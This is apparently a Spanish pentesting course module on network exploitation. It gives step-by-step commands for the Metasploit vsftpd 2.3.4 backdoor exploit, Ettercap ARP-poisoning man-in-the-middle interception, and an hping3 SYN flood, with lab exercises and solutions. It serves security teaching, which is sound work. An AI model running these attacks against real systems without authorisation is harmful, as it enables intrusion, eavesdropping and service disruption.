Introducción

La explotación de vulnerabilidades de red es una fase crítica en el proceso de pentesting. En esta etapa, los pentesters buscan y explotan debilidades en la infraestructura de red para obtener acceso no autorizado, interrumpir servicios o exfiltrar datos. Este módulo cubre las técnicas y herramientas utilizadas para explotar vulnerabilidades de red.

Conceptos Clave

  1. Vulnerabilidades de Red: Fallos en la configuración, implementación o diseño de los componentes de red que pueden ser explotados.
  2. Explotación de Servicios: Ataques dirigidos a servicios específicos que se ejecutan en la red.
  3. Ataques de Intercepción: Técnicas para interceptar y manipular el tráfico de red.
  4. Ataques de Denegación de Servicio (DoS): Métodos para interrumpir la disponibilidad de servicios de red.

Técnicas de Explotación de Red

  1. Explotación de Servicios

Ejemplo: Explotación de un Servicio FTP Vulnerable

Descripción: Un servicio FTP mal configurado puede permitir acceso no autorizado o la ejecución de comandos arbitrarios.

Herramienta: Metasploit Framework

Paso a Paso:

  1. Identificación del Servicio:

    nmap -sV -p 21 <target_ip>
    

    Este comando escanea el puerto 21 para identificar el servicio FTP y su versión.

  2. Búsqueda de Exploits:

    searchsploit vsftpd 2.3.4
    

    Busca exploits conocidos para la versión del servicio FTP identificado.

  3. Carga del Exploit en Metasploit:

    msfconsole
    use exploit/unix/ftp/vsftpd_234_backdoor
    set RHOST <target_ip>
    set RPORT 21
    exploit
    

    Este exploit aprovecha una puerta trasera en vsftpd 2.3.4 para obtener acceso a la shell.

  1. Ataques de Intercepción

Ejemplo: Ataque Man-in-the-Middle (MitM)

Descripción: Un atacante intercepta y manipula el tráfico entre dos partes sin que estas lo sepan.

Herramienta: Ettercap

Paso a Paso:

  1. Habilitar el Envenenamiento ARP:

    echo 1 > /proc/sys/net/ipv4/ip_forward
    ettercap -T -q -i <network_interface> -M arp:remote /<target_ip>/ /<gateway_ip>/
    

    Este comando configura Ettercap para interceptar el tráfico entre el objetivo y el gateway.

  2. Captura de Tráfico:

    ettercap -T -q -i <network_interface> -M arp:remote /<target_ip>/ /<gateway_ip>/ -w capture.pcap
    

    Guarda el tráfico interceptado en un archivo para su análisis posterior.

  1. Ataques de Denegación de Servicio (DoS)

Ejemplo: Ataque SYN Flood

Descripción: Un atacante envía una gran cantidad de solicitudes SYN para agotar los recursos del servidor y hacer que el servicio no esté disponible.

Herramienta: hping3

Paso a Paso:

  1. Ejecutar el Ataque:
    hping3 -S --flood -V -p 80 <target_ip>
    
    Este comando envía un flujo continuo de paquetes SYN al puerto 80 del objetivo.

Ejercicios Prácticos

Ejercicio 1: Explotación de un Servicio FTP Vulnerable

Objetivo: Explorar y explotar un servicio FTP vulnerable utilizando Metasploit.

Instrucciones:

  1. Identifica un servicio FTP en tu red de laboratorio.
  2. Utiliza nmap para identificar la versión del servicio.
  3. Busca exploits disponibles para esa versión.
  4. Carga y ejecuta el exploit en Metasploit.

Solución:

  1. Escanea el servicio FTP:
    nmap -sV -p 21 192.168.1.10
    
  2. Busca exploits:
    searchsploit vsftpd 2.3.4
    
  3. Carga y ejecuta el exploit:
    msfconsole
    use exploit/unix/ftp/vsftpd_234_backdoor
    set RHOST 192.168.1.10
    set RPORT 21
    exploit
    

Ejercicio 2: Realizar un Ataque Man-in-the-Middle

Objetivo: Configurar y ejecutar un ataque MitM utilizando Ettercap.

Instrucciones:

  1. Habilita el envenenamiento ARP.
  2. Configura Ettercap para interceptar el tráfico entre un objetivo y el gateway.
  3. Captura el tráfico para su análisis.

Solución:

  1. Habilita el envenenamiento ARP:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    ettercap -T -q -i eth0 -M arp:remote /192.168.1.5/ /192.168.1.1/
    
  2. Captura el tráfico:
    ettercap -T -q -i eth0 -M arp:remote /192.168.1.5/ /192.168.1.1/ -w capture.pcap
    

Retroalimentación y Consejos

  • Errores Comunes:

    • No verificar la versión del servicio antes de intentar un exploit.
    • No habilitar el reenvío de IP antes de ejecutar un ataque MitM.
    • No monitorear el impacto de un ataque DoS en la red.
  • Consejos Adicionales:

    • Siempre realiza pruebas en un entorno controlado y con permisos adecuados.
    • Documenta cada paso y resultado para facilitar la creación de informes.
    • Mantente actualizado con las últimas vulnerabilidades y exploits.

Conclusión

En este módulo, hemos explorado diversas técnicas para la explotación de vulnerabilidades de red, incluyendo la explotación de servicios, ataques de intercepción y ataques de denegación de servicio. Estas técnicas son fundamentales para evaluar la seguridad de una red y deben ser utilizadas de manera ética y legal. En el próximo módulo, nos centraremos en la post-explotación, donde aprenderemos a escalar privilegios, mantener el acceso y cubrir nuestras huellas.

© Copyright 2024. Todos los derechos reservados